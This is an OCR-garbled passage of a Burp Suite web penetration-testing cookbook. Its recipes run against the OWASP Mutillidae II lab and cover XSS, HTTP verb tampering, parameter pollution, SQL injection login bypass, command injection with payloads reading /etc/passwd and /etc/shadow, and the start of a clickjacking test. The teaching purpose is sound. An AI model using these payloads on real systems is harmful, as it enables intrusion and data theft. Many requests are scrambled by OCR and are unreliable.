Select Pen Test Tool 


Pen Test Tool |Skipfish ~] 


Lookup Tool 


3. Switch to Burp Proxy | HTTP history and find the HTTP message you just 
created by selecting the lookup tool. Note that in the request is a parameter 
called Too1ID. In the following example, the value is 16: 


POST /iutiLidae/ index. pho?page*pen-test-tool-Lockup.php HIT/L.1 

Host: 19°, Le8. $6. 10) 

TsersAgent: Mozilla/$.0 (Windows NT 10.0; inéd; véd; rwzl.0) Gecko/20L00L0. Firetox/él.0 
Accept: text/htnl application/ahtmltiml, application/mailqe0.9,"/";¢0.8 

Accapt=Lanquage: en-V$,en;qe0.4 

Accept-Encoding: gzip, deflate 

Referer: http: //1%2. 160.96. 10L/mutillidae/index. php pagespen-test-tool-Lockup. php 
Content-Type: applicatdon/x-wni-forweur lencoded 

Content-length: é0 

Cookie: showhints=1; PHPSESSID=dL7¢bornolfmdjnyrdadles?; acopendividsesvingset Jotto phpbb: redtine; acgroupswithpersistnada 
Connection: close 

Tpgrade=InsecuresRequests: | 

Cache-Control: nax-age=d 


ToolID=Lekpenstest-tool-Lookupephp=submit-button=Lookupt Tool 


4. Flip over to the Response tab and note the JSON returned from the request. 
You can find the JavaScript function in the response more easily by typing 
PenTest in the search box at the bottom. Note that the tool_id is reflected 
in a response parameter called toolIDRequested. This may be an attack 
vector for XSS: 


Logging of out-of-scope Proxy traffic is disabled | Re-enable 


Fitter: Hiding CSS, image and general binary content 


Host | Method | URL | Params | Edited | Status | Lengt 
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var gUseSafeJSONParser = "FALSE"; 
var gUseJavaScriptValidation = "FALSE"; 
var gDisplayError = "FALSE"; 
var gPenTestToolsJSONString = '{"query": {"toolIDRequested": "16", "penTestTools": [{"tool_id":"16","tool_name": 
Query Tool", "comment": "The Domain Information Groper is prefered on Linux over NSLookup and provides more inform 
output. DIG can perform zone transfers if the DNS server allows transfers."}]}}' 

var addRow = function(pRow0fData){ 

try{ 


var 1DocRoot = window. document ; 
var 1TBody = 1DocRoot . getElement ById("idDisplayTableBody" ) ; 
var 1TR = 1DocRoot.createElement ("tr"); 


//tool_id, tool_name, phase_to_use, tool type, comment 


var 1ToolIDTD = 1DocRoot.createElement ("td"); 
var 1ToolNameTD = 1DocRoot .createElement ("td"); 
var 1PhaseTD = 1DocRoot .createElement ("td"); 
var 1ToolTypeTD = 1DocRoot .createElement ("td"); 
var 1CommentTD = 1DocRoot.createElement ("td"); 


//1KeyTD.addAttribute("class", "label"); 

1Tool IDTD.setAttribute("class", "sub-body"); 
1ToolNameTD.setAttribute("class", "sub-body"); 
1ToolNameTD. setAttribute("style", "color: #770000"); 
1PhaseTD. setAttribute("class", "sub-body"); 

1ToolTypeTD. setAttribute("class" , "sub-body"); 
1CommentTD.setAttribute("class", "sub-body"); 
1CommentTD.setAttribute("style", "font-weight: normal"); 


1Tool IDTD. appendChild(1DocRoot .createTextNode (pRow0fData.tool id) ); 
1ToolNameTD . appendChild(1DocRoot .createTextNode (pRow0fData.tool_ name) ); 
1PhaseTD. appendChild(1DocRoot .createTextNode (pRow0fData.phase_to_use)); 
1ToolTypeTD. appendChild(1DocRoot .createTextNode (pRow0fData. tool _type)); 
1Comment TD . appendChild(1DocRoot . createText Node (pRow0 fData. comment ) ) ; 


1TR. appendChild(1ToolIDTD) ; 


TTD annandChs TAIT Dant Nomen TD i 
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5. Send the request over to Repeater. Add an XSS payload within the ToolID 
parameter immediately following the number. Use a simple payload such 
as <script>alert(1);</script>: 


POST /mutillidae/index.php?page=pen-test-tool-lookup.php HITP/1.1 

Host: 192.168. 56.101 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Wine4; x64; rv:61.0) Gecko/20100101 
Firefox/6l.0 

Aecept: text/html, application/xhtmltxml, application/xml;q=0.9,*/*;q=0.8 
Accept-Langquage: en-US, en;q=0.$ 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.56. 101/mutillidae/index. php?page=pen-test-tool-Lookup. php 
Content-Type: application/x-wiw-form-urlencoded 

Content-Length: 60 

Cookie: showhints=1; PHPSRSSID=d1745borno0Svm4jnjvduSles?; 
acopendivids=swingset, Jotto phpbb, redmine; acgroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: 1 

Cache-Control: max-age=0 


ToolID=Lé<seript>alert (1) ;</seriptydpen-test-tool-Lookup-php-submit-button=LookuptT 


ool 


6. Click Go and examine the returned JSON response, searching for PenTest. 
Notice our payload is returned exactly as inputted. It looks like the 
developer is not sanitizing any of the input data before using it. Let's exploit 
the flaw: 


Response 


| Raw | Headers | Hex Hr | HTML | Render | 


var gUseSafeJSONParser = "FALSE"; 
var gUseJavaScriptValidation = "FALSE"; 
var glisplayError = "FALSE"; 
var gřenl 


'{"query": {"toolIDRequested" : 


_id": "16", "tool name": "Dig", "phase to use": "Reconnaissance", "tool type": "DNS 
Server Query Tool", "comment": "The Domain Information Groper is prefered on Linux 
over NSLookup and provides more information natively. NSLookup must be in debug 
mode to give similar output. DIG can perform zone transfers if the DNS server 
allows transfers."}]}}' 
var addRow = function(pRow0fData) { 
try{ 
var 1DocRoot = window. document ; 
var 1TBody = 1DocRoot . getElement ById( "idDisplayTableBody'" ) ; 
var 1TR = 1DocRoot.createElement ("tr"); 


//tool_id, tool name, phase to use, tool type, comment 


7. Since we are working with JSON instead of HTML, we will need to adjust 
the payload to match the structure of the JSON returned. We will fool the 
JSON into thinking the payload is legitimate. We will modify the original 
<script>alert(1);</script> payload to "}} )%3balert(1)%3b// 
instead. 

8. Switch to the Burp Proxy | Intercept tab. Turn Interceptor on with the button 
Intercept is on. 

9. Return to Firefox, select another tool from the drop-down list, and click the 
Lookup Tool button. 


10. While Proxy | Interceptor has the request paused, insert the new payload 
of "}} )%3balert(1)%3b// immediately after the Tool ID number: 


y Requestto htns!492 (68.56.1010 


POST /mutillidae/index.php?page*pen-test-tool-Lookup. php HITP/L.1 

Host: 192,168.56. 101 

User-Agent: Mozilla/$.0 (Windows NT 10.0; Wined; x64; rv:61.0) Gecko/20100101 Pirefox/él.0 
Accept: text/html, application/xhtmltyml, application/xml;q0.9,*/*;q=0.8 

Accept-Language: en-US, en;q20.§ 

Accept-Bneoding: gzip, deflate 

Referer: http: //192. 168.56. L0L/mutillidae/index. php?page=pen-test-tool-Lookup. php 
Content-Type: application/x-www-form-urlencoded 

Content-Length: 60 

Cookie: showhints=1; PHPSESSID=d174Sborno0Smm4jnjvdmSles2; acopendivids=swingset, jotto,phpbh2, redwine; acgroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: 1 
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11. Click the Forward button. Turn Interceptor off by toggling to Intercept is 
off. 

12. Return to the Firefox browser and see the pop-up alert box displayed. 
You've successfully shown a proof of concept (PoC) for the reflected XSS 
vulnerability: 


How it works... 


Due to inadequate input cleansing prior to using data received from the client. In 
this case, the penetration testing tools identifier is reflected in the response as it 
is received from the client, allowing an attack vector for an XSS attack. 


Testing for stored cross-site scripting 


Stored cross-site scripting occurs when malicious JavaScript is injected into an 
input field, parameter, or header and, after returning from the web server, is 
executed within the browser and becomes a permanent part of the page. Stored 
XSS occurs when the malicious JavaScript is stored in the database and is used 
later to populate the display of a web page. Penetration testers need to test all 
client values sent to the web server to determine whether XSS is possible. 


Getting ready 


Using OWASP Mutillidae II, let's determine whether the application protects 
against stored cross-site scripting. 


How to do it... 


1. From the OWASP Miutilliae II menu, select Login by navigating to OWASP 
2013 | A3 - Cross Site Scripting (XSS) | Persistent (First Order) | Add to 
your blog: 


© OWASP Mutillidae Il: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1 - Script Kiddie) Not Logged In 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL ResetDB ViewLog View Captured 


OWASP 2013 At - Injection (SQL) 


rey sees Pen Test Tool Lookup 


OWASP 2010 


A2 - Broken Authentication and 
OWASP 2007 Session Management Help Me! 


Web Services A3 - Cross Site Scripting (XSS) > Reflected (First Order) 


A4 - Insecure Direct Object > Persistent (Second Order) P| Add to your blog 


2. Place some verbiage into the text area. Before clicking the Save Blog Entry 
button, let's try a payload with the entry: 


os |e Ss Lagh Ep Btn Te 


GUT /uutallidae/inder, php'pageshone. phndpopDpllotificationCode=HPH0 HTTP/1.1 

Host: 192.168.36.10 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Wintd; xét; rv:61.0) Gecko/20100101 Piretow/El.0 

Accept: text/html, application/shtultal, application/amlqel.$,*/* 00.8 

Accept Language: en-US, en; 0.4 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168. $c, L01/utillidae/inder, php?page*howe, phocpoplnllot ficat LonCode=HPH) 

Cookie: shovhintsl; PADSESSID=dl4Shornolfmdjnyréutles:; acopendividssswingset Jotto pbb? reduine; acqroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: | 


3. Switch to the Burp Proxy | Intercept tab. Turn Interceptor on with the button 
Intercept is on. 

4. While Proxy | Interceptor has the request paused, insert the new payload of 
<script>alert(1);</script> immediately following the verbiage you 
added to the blog: 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


[intercept HTTP history | WebSockets history | Options 


4) Request to http://192.168.56.101:80 


| Forward | | Drop | | Intercept is on Action 
_ {paw l Params | Headers | Hex 


POST /mutillidae/index.php?page=add-to-your-blog.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 

Accept: text/html,application/xhtmlt+xml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=add-to-your-blog. phpépopUpNoti ficationCode=SUDL 
Content-Type: application/x-www-form-urlencoded 

Content-Length: 95 

Cookie: showhints=1; PHPSESSID=d174Sborno0Svn4jnjv4mSles2; acopendivids=swingset,jotto,phpbbl,redmine; acgroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: 1 


esrf-token=éblog_entry=Thististmytblogtentr 


add-to-your-blog-php-submit -button=SavetBlogtEntry 


5. Click the Forward button. Turn Interceptor off by toggling to Intercept is 
off. 
6. Return to the Firefox browser and see the pop-up alert box displayed: 


7. Click the OK button to close the pop-ups. Reload the page and you will see 
the alert pop-up again. This is because your malicious script has become a 
permanent part of the page. You've successfully shown a proof of concept 
(PoC) for the stored XSS vulnerability! 


How it works... 


Stored or persistent XSS occurs because the application not only neglects to 
sanitize the input but also stores the input within the database. Therefore, when a 
page is reloaded and populated with database data, the malicious script is 
executed along with that data. 


Testing for HTTP verb tampering 


HTTP requests can include methods beyond GET and POST. As a penetration 
tester, it is important to determine which other HTTP verbs (that is, methods) the 
web server allows. Support for other verbs may disclose sensitive information 
(for example, TRACE) or allow for a dangerous invocation of application code 
(for example, DELETE). Let's see how Burp can help test for HTTP verb 
tampering. 


Getting ready 


Using OWASP Mutillidae II, let's determine whether the application allows 
HTTP verbs beyond GET and POST. 


How to do it... 


z 


Navigate to the homepage of OWASP Mutillidae II. 

2. Switch to Burp Proxy | HTTP history and look for the HTTP request you 
just created while browsing to the homepage of Mutillidae. Note the 
method used is GET. Right-click and send the request to Intruder: 

Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
[intercept | HTTP history WebSockets history | Options 


Filter: Hiding CSS, image and general binary content 


| Extension 


| Title 


| Params 


| Edited | Status | Length | MIME type 


L 


Í Request | Response | 
_[ Raw Params | Headers | Hex 


GET /mutillidae/index.php?page=home.phpápopUpNotificationCode=HPHO HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 

Accept: text/html,application/xhtmltxml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=home.phpépopUpNotificationCode=HPHO 

Cookie: showhints=1; PHPSESSID=d174Sborno0Swn4jnjv4mSles2; acopendivids=swingset,jotto,phpbbl,redmine; acgroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: 1 


3. In the Intruder | Positions tab, clear all suggested payload markers. 
Highlight the GET verb, and click the Add $ button to place payload markers 
around the verb: 


no a in [i ne [no 
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Atac ip: | Sniper 


SCRIS fonti Lida inder. pypageshon.hpcpplio ticat iontode=RPRN 009/11 
Rost: 183.160.36.10 


User-Agent: Monidla/$.0 (Windows MT 10.0; Tinéd; xed; rv:61.0) Cecko/20100101 Pirefor/él.0 

Accept: text/htal, application/ahtwl tial, appLication/1aljq=D.9,"/*; 920.8 

AccentLanquage: en-US engel.’ 

hecept-Incoding: gaip, deflate 

eferer: http: //192. 168,46, 10L/uutillidae/index, php'payezhone. phpcpoplnllotificationCode=HPH) 

ookie: showhunts=]; FHPSESSID=d1 ¢Sbornolmtjnyréusles.; acopendiridsssiingset, jotto, phpbb: rednine; aegeoupswithpersist=nada 
tnnection: close 

Uporade=Insecure=Requests: | 
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4. In the Intruder | Payloads tab, add the following values to the Payload 
Options [Simple list] text box: 
o OPTIONS 
o HEAD 
o POST 


CONNECT 
PROPFIND 
PROPPATCH 


O O O O O O O 0 0 


(2) Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payloads. 


CONNECT 
PROPFIND 


Add Enter a new item 


Add from list ... a 


5. Uncheck the Payload Encoding box at the bottom of the Payloads page and 
then click the Start attack button. 


6. When the attack results table appears, and the attack is complete, note all of 
the verbs returning a status code of 200. This is worrisome as most web 
servers should not be supporting so many verbs. In particular, the support 
for TRACE and TRACK would be included in the findings and final report 
as vulnerabilities: 


| Intruder attack 1 


Attack Save Columns 


| Fitter: Showing all items 


Error 


OPTIONS 
HEAD 
POST 
PUT 
DELETE 
TRACE 
TRACK 
CONNECT 
PROPFIND 
PROPPATCH 
MKCOL 
COPY 


0 
1 
2 
3 
4 
5 
6 
T 
8 
9 
10 
11 


3333833333333] 
ODOOCOOCOOOO0CCO 


ah 
ha 


How it works... 


Testing for HTTP verb tampering includes sending requests against the 
application using different HTTP methods and analyzing the response received. 
Testers need to determine whether a status code of 200 is returned for any of the 
verbs tested, indicating the web server allows requests of this verb type. 


Testing for HTTP Parameter 
Pollution 


HTTP Parameter Pollution (HPP) is an attack in which multiple HTTP 
parameters are sent to the web server with the same name. The intention is to 
determine whether the application responds in an unanticipated manner, allowing 
exploitation. For example, in a GET request, additional parameters can be added 
to the query string—in this fashion: “&name=value”—where name is a duplicate 
parameter name already known by the application code. Likewise, HPP attacks 
can be performed on POST requests by duplicating a parameter name in the 
POST body data. 


Getting ready 


Using OWASP Mutillidae II, let's determine whether the application allows HPP 
attacks. 


How to do it... 


1. From the OWASP Mutilliae II menu, select Login by navigating to OWASP 
2013 | A1 - Injection (Other) | HTTP Parameter Pollution | Poll Question: 


04 OWASP Mutilidae I Web Pun in Mass Production 


Vain 2604 Seite O hosed) Hn El Serge) Net Logged 


Home Login/Register Toggle ints Show Popup Hints Toggle Security Enforce SSL Reset DB View Log View Captured 
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References 


HTML Frame Soure nection 
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HTTP Parameter Pollution A Pol Question 


2. Select a tool from one of the radio buttons, add your initials, and click the 
Submit Vote button: 


S Back 2 Help Me! 


Hints 


User Poll 


Choose Your Favorite Security Tool 


Initial your choice to make your vote count 


nmap 
wireshark 
tcpdump 
netcat 
metasploit 
kismet 

Cain 
Ettercap 
Paros 

Burp Suite 
Sysinternals 
inSIDDer 


Your Initials:|Sw 


No choice selected 


3. Switch to the Burp Proxy | HTTP history tab, and find the request you just 
performed from the User Poll page. Note the parameter named choice. The 
value of this parameter is Nmap. Right-click and send this request to 
Repeater: 


oOooo0oo0o00000000 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
Intercept | HTTP history | WebSockets history | Options 
Logging of out-of-scope Proxy traffic is disabled 


Filter: Hiding CSS, image and general binary content 


# A) Host | Method | URL | Params | Edited | Status | Length | MIMEtype | Extension | Title 


GET /mutillidae/index.php?page=user-poll.phpécsr f-token=é 
Host: 192.168.56.101 
User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 


initials=SWéuser-poll-php-submit-button=Submit+Vote HTTP/1.1 


Accept: text/html, application/xhtmltxml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http: //192.168.56.101/mutillidae/index.php?page=user-poll. php 


Send to Spider 
Do an active scan 
Do a passive scan 
Send to Intruder 


Cookie: showhints=1; PHPSESSID=d174Sborno0Svn4jnjv4mSlces2; acopendivids=swingset ,jotto,phpbbl,redmine; acgroupswithpersist=nada| 
Connection: close 
Upgrade-Insecure-Requests: 1 


4. Switch to the Burp Repeater and add another parameter with the same name 
to the query string. Let's pick another tool from the User Poll list and 
append it to the query string, for example, “&choice=tcpdump”. Click Go to 
send the request: 


Feet [ry [soe [Seamer Lee ual] Seance [ecw [compar [Bana [monet oni 


Go Cancel < > 


Request 
| Raw | Params | Headers | Hex | 
GET 


/mutillidae/index.php?page=user-poll.phpécesrf-token=é&choice=nmapéinitials=SW4choice=tepdumpe 
user-poll-php-submit-button=Submit+Vote HTITP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html,application/xhtmltxml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=user-poll.php 

Cookie: showhints=1; PHPSESSID=d1745borno0S9wn4jnjv4m9$les2; 
acopendivids=swingset,jotto,phpbbl,redmine; acgroupswithpersist=nada 

Connection: close 

Upgrade-Insecure-Requests: 1 


5. Examine the response. Which choice did the application code accept? This 
is easy to find by searching for the Your choice was string. Clearly, the 
duplicate choice parameter value is the one the application code accepted to 
count in the User Poll vote: 


T 


</td> 


</tr> 
<tr> 
<td class="label"> 
Your Initials:<input type="text" name="initials" 
ParameterPollutionInjectionPoint="1" value="5W"/> 


</td> 
</tr> 
<tr><td></td></tr> 
<tr> 


<td style="text-align: center;"> 
<input name="user-poll-php-submit-button" class="button" 
type="submit" value="Submit Vote" /> 


</td> 

</tr> 

<tr><td></td></tr> 

<tr><td></td></tr> 

<tr> 
<td class="report-header" ReflectedXSSkxecutionPoint="1"> 

</tr> 

</table> 
</form> 
</fieldset> 


<script type="text/javascript"> 


try! 
document .getElementById("id choice"). focus (); 
teatch(e){ 
alert (‘Error trying to set focus on field choice: ' + e.message); 
t// end try 
</seript> 


<div>&nbsp; </div> 

<div>&nbsp; </div> 

<fieldset> 

<legend*CSRE Protection Information</legend> 

stable style="margin-left: auto; margin-right: auto;"> 

<tr><td></td></tr> 

<tr><td sal csi ara lala Token: <br/>(Validation not performed) </td></tr> 


How it works... 


The application code fails to check against multiple parameters with the same 
name when passed into a function. The result is that the application usually acts 
upon the last parameter match provided. This can result in odd behavior and 
unexpected results. 


Testing for SQL injection 


A SQL injection attack involves an attacker providing input to the database, 
which is received and used without any validation or sanitization. The result is 
divulging sensitive data, modifying data, or even bypassing authentication 
mechanisms. 


Getting ready 


Using the OWASP Mutillidae I Login page, let's determine whether the 
application is vulnerable to SQL injection (SQLi) attacks. 


How to do it... 


1. From the OWASP Mutilliae IT menu, select Login by navigating to OWASP 
2013 | Al-Injection (SQL) | SQLi — Bypass Authentication | Login: 


@ OWASP Mutillidae Il: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1 -5criptK1dd1e) Not Logged In 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL Reset DB View Log View Captured 


OWASP 2013 A1 - Injection (SQL) >| SQLi - Extract Data 


A1 - Injection (Other) > SQLi - Bypass Authentication >| Login 


OWASP 2010 


2. At the Login screen, place invalid credentials into the username and 
password text boxes. For example, username is tester and password 
is tester. Before clicking the Login button, let's turn on Proxy | 
Interceptor. 

3. Switch to the Burp Proxy | Intercept tab. Turn the Interceptor on by toggling 
to Intercept is on. 


4. While Proxy | Interceptor has the request paused, insert the new payload of 
' or 1=1--<space> within the username parameter and click the Login 
button: 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options 


| intercept | HTTP history | WebSockets history | Options 


U4) Request to http://192.168.56.101:80 


Forward | Drop | Intercept is on | | Action 
Raw | Params | Headers | Hex 


POST /mutillidae/index.php?page=login.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html,application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=login. php 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 61 

Cookie: showhints=l; PHPSESSID=dl174Sborno0Svn4jnjv4m$les2; acopendivids=swingset,jotto,phpbbhl,redmine; acgroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: 1 


username -teste cpassvord=test erélogin-php-submit-button=Login 


5. Click the Forward button. Turn Interceptor off by toggling to Intercept is 
off. 


6. Return to the Firefox browser and note you are now logged in as admin! 


How it works... 


The tester account did not exist in the database; however, the ' or i=1-- 
<space> payload resulted in bypass the authentication mechanism because the 
SQL code constructed the query based on unsanitized user input. The account of 
admin is the first account created in the database, so the database defaulted to 
that account. 


There's more... 


We used a SQLi wordlist from wfuzz within Burp Intruder to test many different 
payloads within the same username field. Examine the response for each attack 
in the results table to determine whether the payload successfully performed a 
SQL injection. 


The construction of SQL injection payloads requires some knowledge of the 
backend database and the particular syntax required. 


Testing for command injection 


Command injection involves an attacker attempting to invoke a system 
command, normally performed at a terminal session, within an HTTP request 
instead. Many web applications allow system commands through the UI for 
troubleshooting purposes. A web-penetration tester must test whether the web 
page allows further commands on the system that should normally be restricted. 


Getting ready 


For this recipe, you will need the SecLists Payload for Unix commands: 


e SecLists-master | Fuzzing | FUZZDB_UnixAttacks.txt 


o Download from GitHub: https://github.com/danielmiessler/SecLists 


Using the OWASP Mutillidae II DNS Lookup page, let's determine whether the 
application is vulnerable to command injection attacks. 


How to do it... 


1. From the OWASP Mutilliae II menu, select DNS Lookup by navigating to 
OWASP 2013 | Ai-Injection (Other) | Command Injection | DNS Lookup: 


Verson. 2AZ4 Seeur Lewe ORoed) fis Eated deft ace} ot Logged 


Home Login/Register Toggle Hints Show Popup Hints Toogle Securty Enforce SSL Reset DO View Lo View Captured 
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2. On the DNS Lookup page, type the IP address 127.0.0.1 in the text box 
and click the Lookup DNS button: 


DNS Lookup 


S Back Q Help Me! 


Hints 
E 
AJAX Switch to SOAP Web Service Version of this Page 


Who would you like to do a DNS lookup on? 


Enter IP or hostname 
Hostname/IP (127.0.0.1 


3. Switch to the Burp Proxy | HTTP history tab and look for the request you 
just performed. Right-click on Send to Intruder: 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
Intercept | HTTP history Í WebSockets history | Options 
Logging of out-of-scope Proxy traffic is disabled 


| Filter: Hiding CSS, image and general binary content 


\# | Host | Method | URL | Params |Edted | Status | Length | MIME type | Extension | Title 


s 


[Request | response | 
[Raw | params | Headers | Hex | x 


POST /mutillidae/index.php?page=dns~lookup.php HTTP/1.1 
Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) ĢGecko/20100101 Firefox/él.0 
Accept: text/html,application/xhtmltxml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 


Referer: http: //192.168.56-101/mutillidae/index.php?page=dns-~loolkup-.php Send to Spider 
Content-Type: application/x-www-form-urlencoded e aa 4 
Content-Length: 61 M a 


Cookie: showhints=l; username=admin; uid=l; PHPSESSID=d1745borno09vn4jnjv4mş| Doa passive scan 
Connection: close 
Upgrade-Insecure-Requests: 1 


to,phpbb2,redmine; acgroupswithpersist=nada 


Send to Repeater Ctr#R 
target_host=127. 0.0. 1édns-lookup-php-submit-button=Loolup+DNS Send to Sequencer 


4. In the Intruder | Positions tab, clear all suggested payload markers with the 
Clear $ button. In the target_host parameter, place a pipe symbol (|) 
immediately following the 127.0.0.1 IP address. After the pipe symbol, 
place an x. Highlight the x and click the Add $ button to wrap the x with 
payload markers: 


Target | Positions | Payloads | Options 


(2) Payload Positions 


~ 


Start attack 
Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions - see help for full details, 
Attack type: | Sniper is) 
POST /mutillidae/index. php?page=dns-lookup.php HTTP/1.1 a Ada § 
Host: 192.168.56.101 
User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 Clear § 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate Auto § 


Referer: http: //192. 168. Sé.101/mutillidae/index.php?page=dns~1lookup. php 
Content-Type: application/x-www-form-urlencoded Refresh 
Content-Length: 61 oe 


Cookie: shovhints=1; username=admin; uid=1; PHPSESSID=d174Sborno0Svn4jnjv4mSlcs2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 


Upgrade-Insecure-Requests: 1 


target_host 9127.0. 0.1|§X$d@ins-1ookup-php-submit-button=Loolup+DNS 


5. In the Intruder | Payloads tab, click the Load button. Browse to the location 
where you downloaded the SecLists-master wordlists from GitHub. 
Navigate to the location of the FUZZDB_UnixAttacks.txt wordlist and use 
the following to populate the Payload Options [Simple list] box: SecLists- 
master |Fuzzing | FUZZDB_UnixAttacks.txt 


(2) Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payloads. 


%00 

000.10 11 letcipasswd 
000.1111 etc/shadow 
%00/ 

“o0O/etc/passwd00 


601 900296039004500a%0d%0aADSF 
08x 

WIAs binid 

‘oO A/usr/bin/id%o04 


E Cnet 


iar a mr jin 
Enter a new item 


Add from list ... 


6. Uncheck the Payload Encoding box at the bottom of the Payloads tab page 
and then click the Start Attack button. 

7. Allow the attack to continue until you reach payload 50. Notice the 
responses through the Render tab around payload 45 or so. We are able to 
perform commands, such as id, on the operating system, which displays the 
results of the commands on the web page: 


Bint: ider attack 3 E 


Attack Save Columns 


(sui | Teroet [Pontos T Paves | ones ] 


| Fitter: Showing all items 


Request 4) Payload | Status | Error | Timeout | Length | Comment | 
42 %00/etc/passwd%00 200 O O 48730 
43 %01%02%03%04%0a%0d%0aADSF 200 O O 48728 
44 %08x 200 48719 
%0A/usr/bin/id%0A 200 UO O 48784 
47 %0Aid 200 O O 48774 
48 %OAID%OA 200 O O 48775 


Resources 


Who would you like to do a DNS lookup 


on? 
i =" 
Getting Started: Enter IP or hostname 
Project Whitepaper 


Hostname /IP 


Pr 


Release 
Announcements 


You 
ERA 


How it works... 


Failure to define and validate user input against an acceptable list of system 
commands can lead to command injection vulnerabilities. In this case, the 
application code does not confine system commands available through the UI, 
allowing visibility and execution of commands on the operating system that 
should be restricted. 


Attacking the Client 


In this chapter, we will cover the following recipes: 


e Testing for Clickjacking 

Testing for DOM-based cross-site scripting 
Testing for JavaScript execution 

Testing for HTML injection 

Testing for client-side resource manipulation 


Introduction 


Code available on the client that is executed in the browser requires testing to 
determine any presence of sensitive information or the allowance of user input 
without server-side validation. Learn how to perform these tests using Burp. 


Software tool requirements 


To complete the recipes in this chapter, you will need the following: 


e OWASP Broken Web Applications (VM) 
e OWASP Mutillidae link 
e Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Testing for Clickjacking 


Clickjacking is also known as the UI redress attack. This attack is a deceptive 
technique that tricks a user into interacting with a transparent iframe and, 
potentially, send unauthorized commands or sensitive information to an attacker- 
controlled website. Let's see how to use the Burp Clickbandit to test whether a 
site is vulnerable to Clickjacking. 


Getting ready 


Using the OWASP Mutillidae II application and the Burp Clickbandit, let's 
determine whether the application protects against Clickjacking attacks. 


How to do it... 


1. Navigate to the Home page of the OWASP Mutillidae II. 
2. Switch to Burp, and from the top-level menu, select Burp Clickbandit: 


ampf intruder Repeater Window Help 


Save copy of project 
Import project [disk projects only] 


Rename project 


Project options 
User options 
Passwords 


Burp Infiltrator 
Burp Clickbandit 
Burp Collaborator client 


Save legacy state file 


Restore legacy state file 
Exit 


3. A pop-up box explains the tool. Click the button entitled Copy Clickbandit 
to clipboard: 


(2) Burp Clickbandit 


Burp Clickbandit is a tool for generating clickjacking attacks. When you have found a web page that may be vulnerable to clickjacking, you can use Burp 
Clickbandit to create an attack, and confirm that the vulnerability can be successfully exploited. 


Burp Clickbandit runs in your browser using JavaScript. It works on all modern browsers except for Microsoft IE and Edge. To run Burp Clickbandit, use the 
following steps: 


1. Click the “Copy Clickbandit to clipboard” button below. This will copy the Clickbandit script to your clipboard. 

2. In your browser, visit the web page that you want to test, in the usual way. 

3. In your browser, open the web developer console. This might also be called "developer tools” or "JavaScript console”. 
4. Paste the Clickbandit script into the web developer console, and press enter. 


See the documentation for more details on using Burp Clickbandit. 


Note: Exercise caution when running Burp Clickbandit on untrusted websites. Malicious JavaScript from the target site can subvert the HTML output that is 
generated by Burp Clickbandit 


[r] | com | 


4. Return to the Firefox browser, and press F12 to bring up the developer 
